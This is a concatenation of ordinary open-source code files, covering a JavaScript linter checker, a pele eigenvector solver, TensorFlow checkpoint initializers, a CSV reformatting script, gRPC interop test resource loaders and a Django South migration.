flags.DEFINE_list('ignored_extra_namespaces', '',
'Fully qualified namespaces that should be not be reported '
'as extra by the linter.')
class JavaScriptStyleChecker(checkerbase.CheckerBase):
"""Checker that applies JavaScriptLintRules."""
def __init__(self, state_tracker, error_handler):
"""Initialize an JavaScriptStyleChecker object.
Args:
state_tracker: State tracker.
error_handler: Error handler to pass all errors to.
"""
self._namespaces_info = None
self._alias_pass = None
if flags.FLAGS.closurized_namespaces:
self._namespaces_info = (
closurizednamespacesinfo.ClosurizedNamespacesInfo(
flags.FLAGS.closurized_namespaces,
flags.FLAGS.ignored_extra_namespaces))
self._alias_pass = aliaspass.AliasPass(
flags.FLAGS.closurized_namespaces, error_handler)
checkerbase.CheckerBase.__init__(
self,
error_handler=error_handler,
lint_rules=javascriptlintrules.JavaScriptLintRules(
self._namespaces_info),
state_tracker=state_tracker)
def Check(self, start_token, limited_doc_checks=False, is_html=False,
stop_token=None):
"""Checks a token stream for lint warnings/errors.
Adds a separate pass for computing dependency information based on
goog.require and goog.provide statements prior to the main linting pass.
Args:
start_token: The first token in the token stream.
limited_doc_checks: Whether to perform limited checks.
is_html: Whether this token stream is HTML.
stop_token: If given, checks should stop at this token.
"""
self._lint_rules.Initialize(self, limited_doc_checks, is_html)
if self._alias_pass:
self._alias_pass.Process(start_token)
# To maximize the amount of errors that get reported before a parse error
# is displayed, don't run the dependency pass if a parse error exists.
if self._namespaces_info:
self._namespaces_info.Reset()
self._ExecutePass(start_token, self._DependencyPass, stop_token)
self._ExecutePass(start_token, self._LintPass, stop_token)
# If we have a stop_token, we didn't end up reading the whole file and,
# thus, don't call Finalize to do end-of-file checks.
if not stop_token:
self._lint_rules.Finalize(self._state_tracker)
def _DependencyPass(self, token):
"""Processes an individual token for dependency information.
Used to encapsulate the logic needed to process an individual token so that
it can be passed to _ExecutePass.
Args:
token: The token to process.
"""
self._namespaces_info.ProcessToken(token, self._state_tracker)
| bsd-3-clause |
khs26/pele | pele/transition_states/_find_lowest_eig.py | 5 | 16110 | """tools for finding the smallest eigenvalue and associated eigenvector
using Rayleigh-Ritz minimization
"""
import numpy as np
import logging
from pele.transition_states import orthogopt
from pele.potentials.potential import BasePotential
from pele.optimize import MYLBFGS
import pele.utils.rotations as rotations
__all__ = ["findLowestEigenVector", "analyticalLowestEigenvalue", "FindLowestEigenVector"]
class LowestEigPot(BasePotential):
"""Potential wrapper for use in an optimizer for finding the eigenvector
Notes
-----
here the energy corresponds to the eigenvalue, and the coordinates to be
optimized is the eigenvector
Parameters
-----------
coords : array
The point in space where we want to compute the lowest eigenvector
pot : potential object
The potential of the system. i.e. pot.getEnergyGradient(coords)
gives the energy and gradient
orthogZeroEigs : callable
The function which makes a vector orthogonal to the known
eigenvectors with zero eigenvalues. The default assumes global
translational and rotational symmetry
dx : float
the local curvature is approximated using points separated by dx
first_order : bool
use the first order forward finite differences approximation for
the curvature rather than the second order central differences
approximation. This is less accurate, but requires one fewer
potential call per iteration.
gradient : float array
the true gradient at coords. If first_order is true and gradient
is not None then one potential call will be saved.
"""
def __init__(self, coords, pot, orthogZeroEigs=0, dx=1e-6,
first_order=True, gradient=None, verbosity=1):
self.pot = pot
self.first_order = first_order
self.nfev = 0
self.verbosity = verbosity
self.update_coords(coords, gradient=gradient)
if orthogZeroEigs == 0:
self.orthogZeroEigs = orthogopt
else:
self.orthogZeroEigs = orthogZeroEigs
self.diff = dx
def _get_true_energy_gradient(self, coords):
"""return the true energy and gradient at coords"""
self.nfev += 1
return self.pot.getEnergyGradient(coords)
def update_coords(self, coords, gradient=None):
"""update the position at which the curvature is computed"""
self.coords = coords.copy()
if self.first_order:
if gradient is not None:
# self.true_energy = energy
self.true_gradient = gradient.copy()
else:
if self.verbosity > 1:
print "possibly computing gradient unnecessarily"
true_energy, self.true_gradient = self._get_true_energy_gradient(self.coords)
def getEnergy(self, vec_in):
"""return the 'energy' a.k.a. the curvature at coords along the direction vec_in"""
if self.orthogZeroEigs is not None:
vec_in /= np.linalg.norm(vec_in)
vec_in = self.orthogZeroEigs(vec_in, self.coords)
vec = vec_in / np.linalg.norm(vec_in)
coordsnew = self.coords + self.diff * vec
Eplus, Gplus = self._get_true_energy_gradient(coordsnew)
if self.first_order:
curvature = np.dot((Gplus - self.true_gradient), vec) / self.diff
else:
coordsnew = self.coords - self.diff * vec
Eminus, Gminus = self._get_true_energy_gradient(coordsnew)
curvature = np.dot((Gplus - Gminus), vec) / (2.0 * self.diff)
return curvature
def getEnergyGradient(self, vec_in):
"""return the curvature and the gradient of the curvature w.r.t. vec_in
vec_in : array
A guess for the lowest eigenvector. It should be normalized
"""
vecl = 1.
if self.orthogZeroEigs is not None:
vec_in /= np.linalg.norm(vec_in)
vec_in = self.orthogZeroEigs(vec_in, self.coords)
vec = vec_in / np.linalg.norm(vec_in)
coordsnew = self.coords + self.diff * vec
Eplus, Gplus = self._get_true_energy_gradient(coordsnew)
if self.first_order:
curvature = np.dot((Gplus - self.true_gradient), vec) / self.diff
else:
coordsnew = self.coords - self.diff * vec
Eminus, Gminus = self._get_true_energy_gradient(coordsnew)
# use second order central difference method.
curvature = np.dot((Gplus - Gminus), vec) / (2.0 * self.diff)
# higher order central differences would be more accurate but it cannot be differentiated analytically
# DIAG = (EPLUS + EMINUS - 2. * ENERGY) / (self.diff)
# DIAG3=2*(DIAG-DIAG2/2)
# C Although DIAG3 is a more accurate estimate of the diagonal second derivative, it
# C cannot be differentiated analytically.
# compute the analytical derivative of the curvature with respect to vec
# GL(J1)=(GRAD1(J1)-GRAD2(J1))/(ZETA*VECL**2)-2.0D0*DIAG2*LOCALV(J1)/VECL**2
if self.first_order:
grad = (Gplus - self.true_gradient) * 2.0 / self.diff - 2. * curvature * vec
else:
grad = (Gplus - Gminus) / (self.diff * vecl ** 2) - 2.0 * curvature * vec / vecl ** 2
if self.orthogZeroEigs is not None:
grad = self.orthogZeroEigs(grad, self.coords)
# Project out any component of the gradient along vec (which is a unit vector)
# This is a big improvement for DFTB.
# js850> grad should already be perpendicular to vec. this helps with any numerical errors
grad -= np.dot(grad, vec) * vec
return curvature, grad
class FindLowestEigenVector(object):
"""A class to compute the lowest eigenvector of the Hessian using Rayleigh-Ritz minimization
Parameters
----------
coords : float array
the point in space at which to compute the lowest eigenvector
pot : Potential object
the potential energy function
eigenvec0 : float array
the initial guess for the lowest eigenvector
orthogZeroEigs : callable
The function which makes a vector orthogonal to the known
eigenvectors with zero eigenvalues. The default assumes global
translational and rotational symmetry
dx : float
the local curvature is approximated using points separated by dx
first_order : bool
use the first order forward finite differences approximation for
the curvature rather than the second order central differences
approximation. This is less accurate, but requires one fewer
potential call per iteration.
gradient : float array
the true gradient at coords. If first_order is true and gradient
is not None then one potential call will be saved.
minimizer_kwargs : kwargs
these kwargs are passed to the optimizer which finds the direction
of least curvature
"""
def __init__(self, coords, pot, eigenvec0=None, orthogZeroEigs=0, dx=1e-6,
first_order=True, gradient=None, **minimizer_kwargs):
self.minimizer_kwargs = minimizer_kwargs
if eigenvec0 is None:
# this random vector should be distributed uniformly on a hypersphere.
eigenvec0 = rotations.vec_random_ndim(coords.shape)
eigenvec0 = eigenvec0 / np.linalg.norm(eigenvec0)
# change some default in the minimizer unless manually set
if "nsteps" not in minimizer_kwargs:
minimizer_kwargs["nsteps"] = 500
if "logger" not in minimizer_kwargs:
minimizer_kwargs["logger"] = logging.getLogger("pele.connect.findTS.leig_quench")
self.eigpot = LowestEigPot(coords, pot, orthogZeroEigs=orthogZeroEigs, dx=dx,
gradient=gradient,
first_order=first_order)
self.minimizer = MYLBFGS(eigenvec0, self.eigpot, rel_energy=True,
**self.minimizer_kwargs)
def stop_criterion_satisfied(self):
"""test if the stop criterion is satisfied"""
return self.minimizer.stop_criterion_satisfied()
def update_coords(self, coords, energy=None, gradient=None):
"""update the position at which to compute the eigenvector"""
self.eigpot.update_coords(coords, gradient=gradient)
state = self.minimizer.get_state()
ret = self.get_result()
self.minimizer = MYLBFGS(ret.eigenvec, self.eigpot, rel_energy=True,
**self.minimizer_kwargs)
self.minimizer.set_state(state)
def one_iteration(self):
"""do one iteration of the minimizer"""
self.minimizer.one_iteration()
def run(self, niter=None):
"""do niter iterations, or until the stop criterion is satisfied"""
if niter is None:
self.minimizer.run()
return self.get_result()
else:
for i in xrange(niter):
if self.minimizer.stop_criterion_satisfied():
break
self.one_iteration()
return self.get_result()
def get_result(self):
"""return the results object"""
res = self.minimizer.get_result()
res.eigenval = res.energy
res.eigenvec = res.coords / np.linalg.norm(res.coords)
delattr(res, "energy")
delattr(res, "coords")
# res.minimizer_state = self.minimizer.get_state()
res.nfev = self.eigpot.nfev
return res
def findLowestEigenVector(coords, pot, eigenvec0=None, H0=None, orthogZeroEigs=0, dx=1e-3,
first_order=True, gradient=None,
**minimizer_kwargs):
"""Compute the lowest eigenvector of the Hessian using Rayleigh-Ritz minimization
***orthogZeroEigs is system dependent, don't forget to set it***
Parameters
----------
coords :
the coordinates at which to find the lowest eigenvector
pot :
potential object
eigenvec0 :
the initial guess for the lowest eigenvector (will be random if not
passed)
H0 : float
the initial guess for the diagonal component of the inverse Hessian
orthogZeroEigs : callable
this function makes a vector orthogonal to the known zero
eigenvectors
orthogZeroEigs=0 : default behavior, assume translational and
rotational symmetry
orthogZeroEigs=None : the vector is unchanged
first_order : bool
use the first order forward finite differences approximation for
the curvature rather than the second order central differences
approximation. This is less accurate, but requires one fewer
potential call per iteration.
gradient : float array
the true gradient at coords. If first_order is true and gradient
is not None then one potential call will be saved.
minimizer_kwargs :
any additional keyword arguments are passed to the minimizer
See Also
--------
FindTransitionState : uses this class
"""
minimizer_kwargs = minimizer_kwargs.copy()
if "iprint" not in minimizer_kwargs:
minimizer_kwargs["iprint"] = 400
if "tol" not in minimizer_kwargs:
minimizer_kwargs["tol"] = 1e-6
optimizer = FindLowestEigenVector(coords, pot, eigenvec0=eigenvec0, H0=H0, orthogZeroEigs=orthogZeroEigs,
dx=dx, first_order=first_order, gradient=gradient, **minimizer_kwargs)
result = optimizer.run()
return result
def analyticalLowestEigenvalue(coords, pot):
"""return the lowest eigenvalue and eigenvector of the hessian computed directly"""
from pele.utils.hessian import get_sorted_eig
"""for testing"""
hess = pot.getHessian(coords)
vals, vecs = get_sorted_eig(hess)
return vals[0], vecs[:, 0]
#
#
# only testing function below here
#
#
#
#
# def testpot2():
# from pele.potentials.lj import LJ
# import itertools
# pot = LJ()
# a = 1.12 #2.**(1./6.)
# theta = 20./360*np.pi
# coords = [ 0., 0., 0., \
# -a, 0., 0., \
# a*np.cos(theta), a*np.sin(theta), 0. ]
# c = np.reshape(coords, [3,3])
# for i, j in itertools.combinations(range(3), 2):
# r = np.linalg.norm(c[i,:] - c[j,:])
# print i, j, r
#
# def testpot1():
# from pele.potentials.lj import LJ
# import itertools
# pot = LJ()
# a = 1.12 #2.**(1./6.)
# theta = 60./360*np.pi
# coords = [ 0., 0., 0., \
# -a, 0., 0., \
# -a/2, a*np.cos(theta), 0., \
# -a/2, -a*np.cos(theta), 0.1 \
# ]
# natoms = len(coords)/3
# c = np.reshape(coords, [-1,3])
# for i, j in itertools.combinations(range(natoms), 2):
# r = np.linalg.norm(c[i,:] - c[j,:])
# print i, j, r
#
# e, g = pot.getEnergyGradient(coords)
# print "initial E", e
# print "initial G", g, np.linalg.norm(g)
#
# eigpot = LowestEigPot(coords, pot)
# vec = np.random.rand(len(coords))
# e, g = eigpot.getEnergyGradient(vec)
# print "eigenvalue", e
# print "eigenvector", g
#
# if True:
# e, g, hess = pot.getEnergyGradientHessian(coords)
# print "shape hess", np.shape(hess)
# print "hessian", hess
# u, v = np.linalg.eig(hess)
# print "max imag value", np.max(np.abs(u.imag))
# print "max imag vector", np.max(np.abs(v.imag))
# u = u.real
# v = v.real
# print "eigenvalues", u
# for i in range(len(u)):
# print "eigenvalue", u[i], "eigenvector", v[:,i]
# #find minimum eigenvalue, vector
# imin = 0
# umin = 10.
# for i in range(len(u)):
# if np.abs(u[i]) < 1e-10: continue
# if u[i] < umin:
# umin = u[i]
# imin = i
# print "lowest eigenvalue ", umin, imin
# print "lowest eigenvector", v[:,imin]
#
#
# from pele.optimize import lbfgs_py as quench
# ret = quench(vec, eigpot.getEnergyGradient, iprint=10, tol = 1e-5, maxstep = 1e-3, \
# rel_energy = True)
# print ret
#
# print "lowest eigenvalue "
# print umin, imin
# print "lowest eigenvector"
# print v[:,imin]
# print "now the estimate"
# print ret[1]
# print ret[0]
#
#def testpot3():
# from transition_state_refinement import guesstsLJ
# pot, coords, coords1, coords2 = guesstsLJ()
# coordsinit = np.copy(coords)
#
# eigpot = LowestEigPot(coords, pot)
#
# vec = np.random.rand(len(coords))
#
# from pele.optimize import lbfgs_py as quench
# ret = quench(vec, eigpot.getEnergyGradient, iprint=400, tol = 1e-5, maxstep = 1e-3, \
# rel_energy = True)
#
# eigval = ret[1]
# eigvec = ret[0]
# print "eigenvalue ", eigval
# print "eigenvector", eigvec
#
# if True:
# e, g, hess = pot.getEnergyGradientHessian(coords)
# u, v = np.linalg.eig(hess)
# u = u.real
# v = v.real
# print "eigenvalues", sorted(u)
# #for i in range(len(u)):
# # print "eigenvalue", u[i], "eigenvector", v[:,i]
# #find minimum eigenvalue, vector
# imin = 0
# umin = 10.
# for i in range(len(u)):
# if np.abs(u[i]) < 1e-10: continue
# if u[i] < umin:
# umin = u[i]
# imin = i
# #print "lowest eigenvalue ", umin, imin
# #print "lowest eigenvector", v[:,imin]
#
#
#
# trueval, truevec = u[imin], v[:,imin]
# print "analytical lowest eigenvalue", trueval
# maxdiff = np.max(np.abs(truevec - eigvec))
# print "maximum difference between estimated and analytical eigenvectors", maxdiff, \
# np.linalg.norm(eigvec), np.linalg.norm(truevec), np.dot(truevec, eigvec)
# if True:
# print eigvec
# print truevec
#
#
#
#if __name__ == "__main__":
# #testpot1()
# testpot3()
#
| gpl-3.0 |
tornadozou/tensorflow | tensorflow/contrib/framework/python/ops/checkpoint_ops.py | 76 | 8864 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating and loading vocab remappings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import init_ops
from tensorflow.python.training import checkpoint_ops
# pylint: disable=protected-access,line-too-long
load_and_remap_matrix_initializer = checkpoint_ops._load_and_remap_matrix_initializer
# pylint: enable=line-too-long
load_embedding_initializer = checkpoint_ops._load_embedding_initializer
# pylint: enable=protected-access
def load_linear_multiclass_bias_initializer(ckpt_path,
bias_tensor_name,
new_class_vocab_size,
old_class_vocab_file,
new_class_vocab_file,
num_class_oov_buckets=0,
initializer=None,
max_rows_in_memory=-1):
"""Loads pre-trained multi-class biases for linear models from checkpoint.
Wrapper around `load_and_remap_matrix_initializer()` specialized for loading
multi-class bias and remapping according to the provided vocab files. See docs
for `load_and_remap_matrix_initializer()` for more details. In this case, the
provided row_vocab is the class vocabulary, and the expected shape is
`[new_class_vocab_size, 1]`.
Args:
ckpt_path: Path to the TensorFlow checkpoint (version 2, `TensorBundle`)
from which the old matrix `Tensor` will be loaded.
bias_tensor_name: Tensor name to load from in the checkpoints.
new_class_vocab_size: Number of entries in the new class vocab.
old_class_vocab_file: A scalar `Tensor` of type `string` containing the
path to the old class vocabulary file.
new_class_vocab_file: A scalar `Tensor` of type `string` containing the
path to the new class vocabulary file.
num_class_oov_buckets: `int` specifying the number of out-of-vocabulary
buckets to use for the classes. Must be >= 0.
initializer: Initializer function that accepts a 1-D tensor as the arg to
specify the shape of the returned tensor. If `None`, defaults to using
`zeros_initializer()`.
max_rows_in_memory: `int` specifying the maximum number of rows to load from
the checkpoint at once. If less than or equal to 0, the entire matrix will
be loaded into memory. Setting this arg trades increased disk reads for
lower memory usage.
Returns:
A variable initializer function.
"""
# Linear multi-class biases should be zero-initialized.
if initializer is None:
initializer = init_ops.zeros_initializer()
return load_and_remap_matrix_initializer(
ckpt_path=ckpt_path,
old_tensor_name=bias_tensor_name,
new_row_vocab_size=new_class_vocab_size,
new_col_vocab_size=1,
old_row_vocab_file=old_class_vocab_file,
new_row_vocab_file=new_class_vocab_file,
old_col_vocab_file=None,
new_col_vocab_file=None,
num_row_oov_buckets=num_class_oov_buckets,
num_col_oov_buckets=0,
initializer=initializer,
max_rows_in_memory=max_rows_in_memory)
def load_variable_slot_initializer(ckpt_path,
old_tensor_name,
primary_partition_info,
new_row_vocab_size,
new_col_vocab_size,
old_row_vocab_file=None,
new_row_vocab_file=None,
old_col_vocab_file=None,
new_col_vocab_file=None,
num_row_oov_buckets=0,
num_col_oov_buckets=0,
initializer=None,
max_rows_in_memory=-1):
"""Loads pre-trained multi-class slots for linear models from checkpoint.
Wrapper around `load_and_remap_matrix_initializer()` specialized for loading
multi-class slots (such as optimizer accumulators) and remapping them
according to the provided vocab files. See docs for
`load_and_remap_matrix_initializer()` for more details. Takes in a
`variable_scope._PartitionInfo` representing the slot's primary `Variable`'s
partitioning. This is necessary since accumulator `Variable` creation ignores
primary scoping and partitioning information.
Args:
ckpt_path: Path to the TensorFlow checkpoint (version 2, `TensorBundle`)
from which the old matrix `Tensor` will be loaded.
old_tensor_name: Name of the 2-D `Tensor` to load from checkpoint.
primary_partition_info: A `variable_scope._PartitionInfo` containing this
slot's primary `Variable`'s partitioning information. This is used to
calculate the offset and override the partition_info passed to the call to
_initialize.
new_row_vocab_size: `int` specifying the number of entries in
`new_row_vocab_file`. If no row remapping is needed (no row vocab
provided), this should be equal to the number of rows to load from the old
matrix (which can theoretically be smaller than the number of rows in the
old matrix).
new_col_vocab_size: `int` specifying the number of entries in
`new_col_vocab_file`. If no column remapping is needed (no column vocab
provided), this should be equal to the number of columns in the old
matrix.
old_row_vocab_file: A scalar `Tensor` of type `string` containing the
path to the old row vocabulary file. Can be None, which represents no
remapping on the row axis.
new_row_vocab_file: A scalar `Tensor` of type `string` containing the path
to the new row vocabulary file. Can be None, which represents no remapping
on the row axis.
old_col_vocab_file: A scalar `Tensor` of type `string` containing the
path to the old column vocabulary file. Can be None, which represents no
remapping on the column axis.
new_col_vocab_file: A scalar `Tensor` of type `string` containing the path
to the new column vocabulary file. Can be None, which represents no
remapping on the column axis.
num_row_oov_buckets: `int` specifying the number of out-of-vocabulary rows
to append. Must be >= 0.
num_col_oov_buckets: `int` specifying the number of out-of-vocabulary
columns to append. Must be >= 0.
initializer: Initializer function to initialize missing values. Accepts a
1-D tensor as the arg to specify the shape of the returned tensor. If
`None`, defaults to using `zeros_initializer()`.
max_rows_in_memory: `int` specifying the maximum number of rows to load from
the checkpoint at once. If less than or equal to 0, the entire matrix will
be loaded into memory. Setting this arg trades increased disk reads for
lower memory usage.
Returns:
A variable initializer function that should be used to initialize a
(potentially partitioned) `Variable` whose complete shape is
`[new_row_vocab_size + num_row_oov_buckets, new_col_vocab_size +
num_col_oov_buckets]`.
Raises:
TypeError: If `initializer` is specified but not callable.
"""
initializer_fn = load_and_remap_matrix_initializer(
ckpt_path=ckpt_path,
old_tensor_name=old_tensor_name,
new_row_vocab_size=new_row_vocab_size,
new_col_vocab_size=new_col_vocab_size,
old_row_vocab_file=old_row_vocab_file,
new_row_vocab_file=new_row_vocab_file,
old_col_vocab_file=old_col_vocab_file,
new_col_vocab_file=new_col_vocab_file,
num_row_oov_buckets=num_row_oov_buckets,
num_col_oov_buckets=num_col_oov_buckets,
initializer=initializer,
max_rows_in_memory=max_rows_in_memory)
def _initializer(shape, dtype=dtypes.float32, partition_info=None):
del partition_info # Unused by this override.
return initializer_fn(shape, dtype, partition_info=primary_partition_info)
return _initializer
| apache-2.0 |
skihyy/GT-Spring-2017-CS6262 | decision_tree/reformater.py | 1 | 1607 | import csv
"""
with open('combined.csv', 'rb') as r:
with open('reformatted.csv', 'wb') as w:
data = csv.reader(r, delimiter=',')
for line in data:
length = len(line)
for i in range(0, length):
if 'FALSE' == line[i]:
line[i] = 0
elif 'TRUE' == line[i]:
line[i] = 1
writer = csv.writer(w)
writer.writerows(data)
w.close()
r.close()
with open("new-data-set.csv", 'rb') as r:
with open("new-data-set-refined.csv", 'wb') as w:
data = []
for line in csv.reader(r):
for i in range(len(line)):
if 0 == len(line[i].strip()):
line[i] = '0'
data.append(line)
writer = csv.writer(w)
writer.writerows(data)
w.close()
r.close()
with open("new-data-set.csv", 'rb') as r:
for line in csv.reader(r):
print(line)
r.close()
with open("final_bad.csv", 'rb') as r1:
with open("final_good.csv", 'rb') as r2:
with open("final-data.csv", 'wb') as w:
data = []
for line in csv.reader(r1):
data.append(line)
for line in csv.reader(r2):
data.append(line)
writer = csv.writer(w)
writer.writerows(data)
w.close()
r2.close()
r1.close()
with open("result.csv", 'a+') as w:
writer = csv.writer(w)
writer.writerow(
[0, 1, 2, 3, 4])
w.close()"""
with open("final-data-new.csv", 'rb') as r:
for line in csv.reader(r):
print(line)
r.close()
| mit |
rjshade/grpc | src/python/grpcio_tests/tests/interop/resources.py | 23 | 2413 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Constants and functions for data used in interoperability testing."""
import argparse
import os
import pkg_resources
_ROOT_CERTIFICATES_RESOURCE_PATH = 'credentials/ca.pem'
_PRIVATE_KEY_RESOURCE_PATH = 'credentials/server1.key'
_CERTIFICATE_CHAIN_RESOURCE_PATH = 'credentials/server1.pem'
def test_root_certificates():
return pkg_resources.resource_string(__name__,
_ROOT_CERTIFICATES_RESOURCE_PATH)
def private_key():
return pkg_resources.resource_string(__name__, _PRIVATE_KEY_RESOURCE_PATH)
def certificate_chain():
return pkg_resources.resource_string(__name__,
_CERTIFICATE_CHAIN_RESOURCE_PATH)
def parse_bool(value):
if value == 'true':
return True
if value == 'false':
return False
raise argparse.ArgumentTypeError('Only true/false allowed')
| bsd-3-clause |
hybrid1969/eve-wspace | evewspace/account/migrations/0004_auto__add_ewsuser__chg_field_userprofile_user.py | 6 | 11121 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_table('auth_user', 'account_ewsuser')
db.rename_table('auth_user_groups', 'account_ewsuser_groups')
db.rename_table('auth_user_user_permissions', 'account_ewsuser_user_permissions')
db.rename_column('account_ewsuser_user_permissions', 'user_id', 'ewsuser_id')
db.rename_column('account_ewsuser_groups', 'user_id', 'ewsuser_id')
# Changing field 'UserProfile.user'
db.alter_column(u'account_userprofile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['account.EWSUser'], unique=True))
if not db.dry_run:
orm['contenttypes.contenttype'].objects.filter(app_label='auth',
model='user').update(app_label='account', model='ewsuser')
def backwards(self, orm):
db.rename_table('account_ewsuser', 'auth_user')
db.rename_table('account_ewsuser_groups', 'auth_user_groups')
db.rename_table('account_ewsuser_user_permissions', 'auth_user_user_permissions')
db.rename_column('auth_user_groups', 'ewsuser_id', 'user_id')
db.rename_column('auth_user_user_permissions', 'ewsuser_id', 'user_id')
# Changing field 'UserProfile.user'
db.alter_column(u'account_userprofile', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], unique=True))
if not db.dry_run:
orm['contenttypes.contenttype'].objects.filter(app_label='account',
model='ewsuser').update(app_label='auth', model='user')
models = {
u'Map.map': {
'Meta': {'object_name': 'Map'},
'explicitperms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'root': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'root'", 'to': u"orm['Map.System']"})
},
u'Map.system': {
'Meta': {'object_name': 'System', '_ormbases': [u'core.SystemData']},
'first_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'importance': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'lastscanned': ('django.db.models.fields.DateTimeField', [], {}),
'npckills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'occupied': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'podkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'shipkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sysclass': ('django.db.models.fields.IntegerField', [], {}),
u'systemdata_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.SystemData']", 'unique': 'True', 'primary_key': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'account.ewsuser': {
'Meta': {'object_name': 'EWSUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'account.groupprofile': {
'Meta': {'object_name': 'GroupProfile'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'group': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'regcode': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'account.playtime': {
'Meta': {'object_name': 'PlayTime'},
'fromtime': ('django.db.models.fields.TimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'totime': ('django.db.models.fields.TimeField', [], {})
},
u'account.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'currentsystem': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'activepilots'", 'null': 'True', 'to': u"orm['Map.System']"}),
'defaultmap': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'defaultusers'", 'null': 'True', 'to': u"orm['Map.Map']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'jabberid': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'lastactive': ('django.db.models.fields.DateTimeField', [], {}),
'playtimes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['account.PlayTime']", 'symmetrical': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['account.EWSUser']", 'unique': 'True'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
